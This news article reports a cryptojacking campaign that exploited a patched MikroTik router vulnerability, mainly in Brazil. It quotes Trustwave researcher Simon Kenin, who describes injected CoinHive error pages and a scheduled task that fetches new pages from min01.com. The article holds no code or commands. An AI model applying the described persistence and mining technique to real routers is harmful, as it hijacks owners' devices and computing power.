A malicious cryptocurrency mining operation that utilises an unpatched vulnerability in MikroTik network routers has been targeting systems globally with a particular focus on Brazil.
The attacker targets a known vulnerability in Mikrotik enterprise routers and runs an exploit script to obtain administrator privileges on the router.
They install a custom page that only appears when an error occurs.
Within this custom page is the code that utilises any leftover computational power for the purpose of cryptomining.
Simon Kenin, a researcher at Trustwave noticed the unusual activity when he spotted a spike of CoinHive activity in Brazil.
Kenin commented in a blog post that: “I saw that all of these devices were using the same CoinHive sitekey, meaning that they all ultimately mine into the hands of one entity.”
CoinHive is a JavaScript cryptocurrency miner for the Monero Blockchain. It is low in size and can be embedded in a browser, it is for this reason that it has become popular with threat actors.
Content from our partners
Hidden Threat
Mr Kenin also noted: “The attacker is clearly showing a high level of understanding of how these MikroTik routers work.”
“This can be seen in the persistence mechanism of the attacker: The attacker scheduled a task which connects to another host “min01.com” and fetches a new “error.html” file.”
“This was probably put in place in case CoinHive blocked the attacker’s current site-key and it had to be replaced with another,” he added.
Mikrotik are a manufacturer of computer networking equipment with a particular focus on wireless devices and routers, they were founded in Latvia in 1995.
The vulnerability that is been exploited was in fact patched very quickly once it was discovered last April by Mikrotic, they quickly issued an update for the routers affected.
However, there is nothing more they can do in this situation, except advice IT workers with unpatched routers to get the latest software version immediately.
Interestingly, Kenin could see the attack attempting to brush his footprints out of the snow: “I noticed this script being updated a few times while working on this blog. The attacker seems to be adding more cleanup commands to leave a smaller footprint and reduce risk of being detected.”
